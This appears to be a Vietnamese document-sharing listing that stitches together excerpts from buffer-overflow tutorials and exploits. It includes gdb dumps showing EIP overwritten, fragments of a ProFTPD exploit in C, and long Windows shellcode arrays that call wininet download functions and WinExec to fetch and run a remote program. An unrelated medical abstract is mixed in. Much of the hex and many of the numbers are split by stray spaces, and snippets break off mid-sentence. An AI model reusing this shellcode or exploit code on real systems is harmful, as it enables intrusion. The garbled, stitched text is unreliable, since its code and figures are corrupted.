làm tràn bộ đệm bằng 1 byte

... của bộ đệm bị làm tràn và địa chỉ của con trỏ đến bộ đệm của chúng ta (&shellcode). Hãy chạy chương trình như thể chúng ta muốn nó bị làm tràn bởi chuỗi nhập có chiều dài 257 byte. Để làm ... $0x1,0x8(%ebp) 0x804 818 7 <main+7>: jg 0x80481a0 <main+32> 0x804 818 9 <main+9>: pushl $0x8058ad8 0x804 818 e <main +14 >: call 0x80481b8 <printf> 0x804 819 3 <main +19 >: ... main: 0x804 818 0 <main>: pushl %ebp 0x804 818 1 <main +1& gt;: movl %esp,%ebp 0x804 818 3 <main+3>: cmpl $0x1,0x8(%ebp) 0x804 818 7 <main+7>: jg 0x80481a0 <main+32> 0x804 818 9 <main+9>:...

Ngày tải lên: 02/11/2012, 14:18

... 0x 414 1 414 1 in ?? () (gdb) info all eax 0xbffffbc4 -10 73742908 ecx 0xbffffbc4 -10 73742908 edx 0x4 010 5dbc 10 74 814 396 ebx 0x4 010 748c 10 74820236 esp 0xbffffbe0 0xbffffbe0 ebp 0x 414 1 414 1 0x 414 1 414 1 // ... chúng ta đã ghi đè lên ebp esi 0x4000a 610 10 73784336 edi 0xbffffc24 -10 73742 812 eip 0x 414 1 414 1 0x 414 1 414 1 // chúng ta đã ghi đè lên eip eflags 0x10282 6 617 8 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es ... cục bộ của hàm function() Vì chương trình 32 bits nên 5 bytes buffer1 sẽ là 8 bytes(2 words) trong bộ nhớ(do làm tròn đến 4 bytes hay là 32 bits), 10 bytes buffer2 sẽ là 12 bytes trong bộ nhớ(3...

Ngày tải lên: 23/08/2012, 16:28

... 0x 414 1 414 1 in ?? () (gdb) info all eax 0xbffffbc4 -10 73742908 ecx 0xbffffbc4 -10 73742908 edx 0x4 010 5dbc 10 74 814 396 ebx 0x4 010 748c 10 74820236 esp 0xbffffbe0 0xbffffbe0 ebp 0x 414 1 414 1 0x 414 1 414 1 // ... 0x 414 1 414 1 in ?? () (gdb) info all eax 0xbffffbc4 -10 73742908 ecx 0xbffffbc4 -10 73742908 edx 0x4 010 5dbc 10 74 814 396 ebx 0x4 010 748c 10 74820236 esp 0xbffffbe0 0xbffffbe0 ebp 0x 414 1 414 1 0x 414 1 414 1 // ... chúng ta đã ghi đè lên ebp esi 0x4000a 610 10 73784336 edi 0xbffffc24 -10 73742 812 eip 0x 414 1 414 1 0x 414 1 414 1 // chúng ta đã ghi đè lên eip eflags 0x10282 6 617 8 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es...

Ngày tải lên: 24/08/2012, 08:45

... 0x 414 1 414 1 in ?? () (gdb) info all eax 0xbffffbc4 -10 73742908 ecx 0xbffffbc4 -10 73742908 edx 0x4 010 5dbc 10 74 814 396 ebx 0x4 010 748c 10 74820236 esp 0xbffffbe0 0xbffffbe0 ebp 0x 414 1 414 1 0x 414 1 414 1 // ... 0x 414 1 414 1 in ?? () (gdb) info all eax 0xbffffbc4 -10 73742908 ecx 0xbffffbc4 -10 73742908 edx 0x4 010 5dbc 10 74 814 396 ebx 0x4 010 748c 10 74820236 esp 0xbffffbe0 0xbffffbe0 ebp 0x 414 1 414 1 0x 414 1 414 1 // ... chúng ta đã ghi đè lên ebp esi 0x4000a 610 10 73784336 edi 0xbffffc24 -10 73742 812 eip 0x 414 1 414 1 0x 414 1 414 1 // chúng ta đã ghi đè lên eip eflags 0x10282 6 617 8 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es...

Ngày tải lên: 01/10/2012, 15:35

... đệm dùng làm tràn lớn hơn so với bộ đệm bị tràn khoảng 10 0 byte là tốt nhất. Khi đó bộ đệm làm tràn có phần đầu khá lớn chứa các NOP, phần cuối chứa shellcode và địa chỉ đủ để làm tràn và ghi ... biết những gì cần thiết để khai thác lỗi tràn bộ đệm, bây giờ cần phải kết hợp lại. Các bước cơ bản của kỹ thuật tràn bộ đệm là: chuẩn bị bộ đệm dùng để làm tràn (như ở phần trên), xác định địa ... (xem phần 1) . Có thể thấy chương trình exploit1.c không thể khai thác được lỗi tràn bộ đệm trong vuln.c do kích thước bộ đệm bị tràn quá nhỏ (16 byte) không đủ để đặt vừa shellcode. Khi đó địa...

Ngày tải lên: 02/11/2012, 14:18

... /lib/ld-linux.so.2 done. #0 0x 414 1 414 1 in ?? () (gdb) info register eip eip 0x 414 1 414 1 10 94795585 (gdb) Thanh ghi eip - con trỏ lệnh hiện hành - có giá trị 0x 414 1 414 1, tương đương 'AAAA' ... 0x 41 hexa). Ta thấy, có thể thay đổi giá trị của thanh ghi con trỏ lệnh eip bằng cách làm tràn bộ đệm buf. Khi lỗi tràn bộ đệm đã xảy ra, ta có thể khiến chương trình thực thi mã lệnh tuỳ ý bằng ... hiểu rõ quá trình tràn bộ đệm xảy ra như thế nào, chúng ta sẽ xem xét chi tiết tổ chức bộ nhớ, stack và cơ chế gọi hàm của một chương trình. 1. Tổ chức bộ nhớ 1. 1 Tổ chức bộ nhớ của một tiến...

Ngày tải lên: 02/11/2012, 14:18

... sambar có thể thay đổi code va phát triển một module để kiểm tra việc đi lại các file của user và bộ đệm của form transfer ở chế độ POST hay GET. ... [INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="đặt text của bạn ở đây, nhớ là hơn 10 0000 ký tự"] và BƯỚC 7: nhấn submit và server ! GIẢI PHÁP: - Thay đổi đường dẫn và thư...

Ngày tải lên: 02/11/2012, 14:18

... 80 *[+] Retaddr address: 0xbfffd838 * [1] #1 Set codes. *[*] attempting to connect: 12 7.0.0 .1: 21. *[*] successfully connected: 12 7.0.0 .1: 21. *<- 220 ProFTPD 1. 2.8 Server (ProFTPD Default Installation) ... failed." ,1) ; if(ftp_i==3) if(strncmp(buf,"250",3)) Lỗi tràn bộ đệm file dài trong webfs trang này đã được đọc lần Webfs ( http://bytesex.org/webfs.html) là một httpd server , lỗi tràn bộ đệm ... %p\n",retaddr); } fprintf(stdout," [1] #1 Set codes.\n"); ftpsd=sock_connect(hostname, 21) ; ftp_parse(ftpsd); memset(buf3,0x42 ,14 1); memset(buf2,0x90 ,10 00); memcpy(buf2 +10 00,shell,strlen(shell)); memset(buf2 +10 00+strlen(shell),0x90 ,10 00); snprintf(sendbuf, 315 0,"GET...

Ngày tải lên: 02/11/2012, 14:18

... NULL); "\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4" "\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0" "\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75" "\x6C\x65\x48\x 61\ x6E\x64\x6C\x65\x 41\ x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2d\x64" "\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x 41\ x64\x64\x72\x65\x73\x73\x08\x4C\x6F" "\x 61\ x64\x4C\x69\x62\x72\x 61\ x72\x79\x 41\ x08\x5F\x6C\x63\x72\x65\x 61\ x74\x08\x5F" "\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x 61\ x6C\x 41\ x6C\x6C\x6F\x63\x08\x5F" "\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50" "\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2d\x64\x6C\x6C\x08\x49" "\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x 41\ x08\x49\x6E\x74\x65\x72\x6E\x65" "\x74\x4F\x70\x65\x6E\x55\x72\x6C\x 41\ x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65" "\x 61\ x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65" "\x48\x 61\ x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2d\x65\x78\x65\x08\x68" "\x74\x74\x70\x3A\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93" "\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93" "\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93" "\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93" "\x93\x93\x93\x93\x93\x93\x93\x93\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x25\x49\xE1" "\x77\x90\x90\x90\x90\xFE\x83\x75\xFE\xFF\xFF\xFE\x83\xD5\xFE\xFF\xFF\xFE\x83\x25" "\xFF\xFF\xFF\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x80\xAB\x2F\xFF\xFF\xFF\x03\x80\xAB\x30\xFF\xFF\xFF\x03\x80\xAB\x 31\ xFF\xFF\xFF" "\x03\x80\xAB\x32\xFF\xFF\xFF\x03\x80\xAB\x33\xFF\xFF\xFF\x03\x80\xAB\x34\xFF\xFF" "\xFF\x03\x80\xAB\x35\xFF\xFF\xFF\x03\x80\xAB\x36\xFF\xFF\xFF\x03\x80\xAB\x37\xFF" "\xFF\xFF\x03\x80\xAB\x38\xFF\xFF\xFF\x03\x80\xAB\x39\xFF\xFF\xFF\x03\x80\xAB\x3A" "\xFF\xFF\xFF\x03\x80\xAB\x3B\xFF\xFF\xFF\x03\x80\xAB\x3C\xFF\xFF\xFF\x03\x80\xAB" "\x3D\xFF\xFF\xFF\x03\x80\xAB\x3E\xFF\xFF\xFF\x03\x80\xAB\x3F\xFF\xFF\xFF\x03\x80" "\xAB\x40\xFF\xFF\xFF\x03\x80\xAB\x 41\ xFF\xFF\xFF\x03\x80\xAB\x42\xFF\xFF\xFF\x03" "\x80\xAB\x43\xFF\xFF\xFF\x03\x80\xAB\x44\xFF\xFF\xFF\x03\x80\xAB\x45\xFF\xFF\xFF" "\x03\x80\xAB\x46\xFF\xFF\xFF\x03\x80\xAB\x47\xFF\xFF\xFF\x03\x80\xAB\x48\xFF\xFF" "\xFF\x03\x80\xAB\x49\xFF\xFF\xFF\x03\x80\xAB\x4A\xFF\xFF\xFF\x03\x80\xAB\x4B\xFF" "\xFF\xFF\x03\x80\xAB\x4C\xFF\xFF\xFF\x03\x80\xAB\x4D\xFF\xFF\xFF\x03\x80\xAB\x4E" "\xFF\xFF\xFF\x03\x80\xAB\x4F\xFF\xFF\xFF\x03\x80\xAB\x50\xFF\xFF\xFF\x03\x80\xAB" "\x 51\ xFF\xFF\xFF\x03\x80\xAB\x52\xFF\xFF\xFF\x03\x80\xAB\x53\xFF\xFF\xFF\x03\x80" "\xAB\x54\xFF\xFF\xFF\x03\x80\xAB\x55\xFF\xFF\xFF\x03\x80\xAB\x56\xFF\xFF\xFF\x03" "\x80\xAB\x57\xFF\xFF\xFF\x03\x80\xAB\x58\xFF\xFF\xFF\x03\x80\xAB\x59\xFF\xFF\xFF" "\x03\x80\xAB\x5A\xFF\xFF\xFF\x03\x80\xAB\x5B\xFF\xFF\xFF\x03\x80\xAB\x5C\xFF\xFF" "\xFF\x03\x80\xAB\x5D\xFF\xFF\xFF\x03\x80\xAB\x5E\xFF\xFF\xFF\x03\x80\xAB\x5F\xFF" "\xFF\xFF\x03\x80\xAB\x60\xFF\xFF\xFF\x03\x80\xAB\x 61\ xFF\xFF\xFF\x03\x80\xAB\x62" "\xFF\xFF\xFF\x03\x80\xAB\x63\xFF\xFF\xFF\x03\x80\xAB\x64\xFF\xFF\xFF\x03\x80\xAB" "\x65\xFF\xFF\xFF\x03\x80\xAB\x66\xFF\xFF\xFF\x03\x80\xAB\x67\xFF\xFF\xFF\x03\x80" "\xAB\x68\xFF\xFF\xFF\x03\x80\xAB\x69\xFF\xFF\xFF\x03\x80\xAB\x6A\xFF\xFF\xFF\x03" "\x80\xAB\x6B\xFF\xFF\xFF\x03\x80\xAB\x6C\xFF\xFF\xFF\x03\x80\xAB\x6D\xFF\xFF\xFF" "\x03\x80\xAB\x6E\xFF\xFF\xFF\x03\x80\xAB\x6F\xFF\xFF\xFF\x03\x80\xAB\x70\xFF\xFF" "\xFF\x03\x80\xAB\x 71\ xFF\xFF\xFF\x03\x80\xAB\x72\xFF\xFF\xFF\x03\x80\xAB\x73\xFF" "\xFF\xFF\x03\x80\xAB\x74\xFF\xFF\xFF\x03\x80\xAB\x75\xFF\xFF\xFF\x03\x80\xAB\x76" "\xFF\xFF\xFF\x03\x80\xAB\x77\xFF\xFF\xFF\x03\x80\xAB\x78\xFF\xFF\xFF\x03\x80\xAB" "\x79\xFF\xFF\xFF\x03\x80\xAB\x7A\xFF\xFF\xFF\x03\x80\xAB\x7B\xFF\xFF\xFF\x03\x80" Tràn ... = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x30\x5F\xFC\x8B\xF7\x80" "\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x 01\ x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1" "\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B" "\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40" "\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D" "\xF8\x 81\ x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33" "\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80" "\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x 51\ xF3\xA6" "\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02" "\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x 11\ x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03" "\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03" "\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76" "\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x 51\ xF3\xA6\x59\x5E\x74\x06" "\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02" "\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D" "\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x 51\ x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC" "\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1" "\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x 51\ x53" "\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9" "\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0" "\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D" "\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B" "\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1" "\xE2\x08\x52\x8B\x4D\xB0\x 51\ x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x 51\ x8B\x45\xB4" "\xFF\xD0\x8B\x4D\xAC\x 51\ x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0" ... = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x30\x5F\xFC\x8B\xF7\x80" "\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x 01\ x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1" "\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B" "\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40" "\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D" "\xF8\x 81\ x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33" "\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80" "\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x 51\ xF3\xA6" "\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02" "\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x 11\ x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03" "\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03" "\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76" "\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x 51\ xF3\xA6\x59\x5E\x74\x06" "\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02" "\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D" "\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x 51\ x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC" "\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1" "\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x 51\ x53" "\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9" "\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0" "\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D" "\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B" "\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1" "\xE2\x08\x52\x8B\x4D\xB0\x 51\ x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x 51\ x8B\x45\xB4" "\xFF\xD0\x8B\x4D\xAC\x 51\ x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0" ...

Ngày tải lên: 02/11/2012, 14:19

... $7 * Ghi chú: e - Extended 32 bits % - register mov %src, %des movl - move 1 long movb - move 1 byte movw - move 1 word $ - hằng # - chú thích ... | | | | | <- ESP mới = ESP cũ + sizeof(value)(2) | | (1) <- value | <- ESP cũ đáy của bộ nhớ \ / đỉnh của stack 1/ value được lấy ra khỏi stack 2/ ESP=ESP+sizeof(value) Khác nhau ... 1/ ESP=ESP-sizeof(value) 2/ value được đẩy vào stack * POP một value ra khỏi stack đỉnh của bộ nhớ / \ đáy của stack | | | | | | | | | |...

Ngày tải lên: 26/10/2013, 02:20

Ngày tải lên: 26/10/2013, 02:20

Ngày tải lên: 01/11/2013, 17:20

Ngày tải lên: 25/01/2014, 14:20

Ngày tải lên: 09/03/2014, 21:08

Ngày tải lên: 24/03/2014, 14:21

Ngày tải lên: 26/05/2014, 03:31

Ngày tải lên: 20/06/2014, 18:20

... Result: From 01/ 2002 to 12 /2006, there were 17 9 cases of CSP (included 74 primary SP and 12 3 secondary SP). There were 17 4 male and 23 female patients. The average age was 51. 83 (range, 21 to 85). ... LDMP bằng talc. Tỉ lệ tái phát và biến chứng muộn sau thời gian theo dõi từ 1 – 4 năm Về tỉ lệ tái phát, chỉ có 17 6 /18 9 trường hợp (93 ,12 %) LDMP bằng talc được theo dõi tiếp trong vòng 1 – ... Từ 01/ 2002 đến 12 /2006, có 19 7 trường hợp TKMPTP biến chứng (gồm 74 TKMPTP nguyên phát và 12 3 TKMPTP thứ phát). Có 17 4 trường hợp nam và 23 trường hợp nữ. Tuổi trung bình là 51, 83 (từ 17 –...

Ngày tải lên: 16/11/2012, 09:21

Ngày tải lên: 02/03/2013, 16:56